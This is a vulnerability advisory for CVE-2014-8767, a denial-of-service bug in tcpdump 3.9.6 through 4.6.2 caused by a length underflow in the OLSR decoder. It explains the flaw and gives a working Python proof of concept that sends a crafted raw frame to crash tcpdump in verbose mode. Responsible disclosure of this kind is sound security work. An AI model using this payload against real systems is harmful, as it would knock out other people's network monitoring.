tcpdump 4.6.2 OSLR Denial Of Service

`CVE-2014-8767 tcpdump denial of service in verbose mode using malformed   
OLSR payload  
  
1. Background  
  
tcpdump is a powerful command-line packet analyzer. It allows the user   
to intercept and display TCP/IP and other packets being transmitted or   
received over a network to which the computer is attached.  
  
2. Summary Information  
  
It was found out that malformed network traffic (OLSR-based) can lead to   
an application crash (denial of service) if verbose output of tcpdump   
monitoring the network is used.  
  
3. Technical Description  
  
The application decoder for the OLSR protocol fails to perform external   
input validation and performs insufficient checking on length   
computations leading to an unsafe decrement and underflow in the function  
  
olsr_print (const u_char *pptr, u_int length, int is_ipv6)  
  
In this function msg_len is extracted from the input without sufficient   
checks and subtracted sizeof(struct olsr_msg4) which leads to an   
underflow of msg_tlen which is used to call olsr_print_neighbor() which   
will crash. In case DNS reverse lookup is enabled, this will also lead   
to a large amount of invalid DNS reverse lookups.  
  
To reproduce start tcpdump on a network interface  
  
sudo tcpdump -i lo -s 0 -n -v  
  
(running the program with sudo might hide the segfault message on   
certain environments, see dmesg for details)  
  
and use the following python program to generate a frame on the network   
(might also need sudo):  
  
#!/usr/bin/env python  
from socket import socket, AF_PACKET, SOCK_RAW  
s = socket(AF_PACKET, SOCK_RAW)  
s.bind(("lo", 0))  
  
olsr_frame =   
"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"  
  
s.send(olsr_frame)  
  
4. Affected versions  
  
Affected versions are 3.9.6 through 4.6.2  
  
5. Fix  
  
The problem is fixed in the upcoming version tcpdump 4.7.0  
  
6. Advisory Timeline  
  
2014-11-08 Discovered  
2014-11-09 Requested CVE  
2014-11-11 Reported vendor by email  
2014-11-12 Vendor made a fix available as repository patch  
2014-11-13 CVE number received  
2014-11-13 Published CVE advisory  
  
7. Credit  
  
The issue was found by  
  
Steffen Bauch  
Twitter: @steffenbauch  
http://steffenbauch.de  
  
using a slightly enhanced version of american fuzzy lop   
(https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.  
`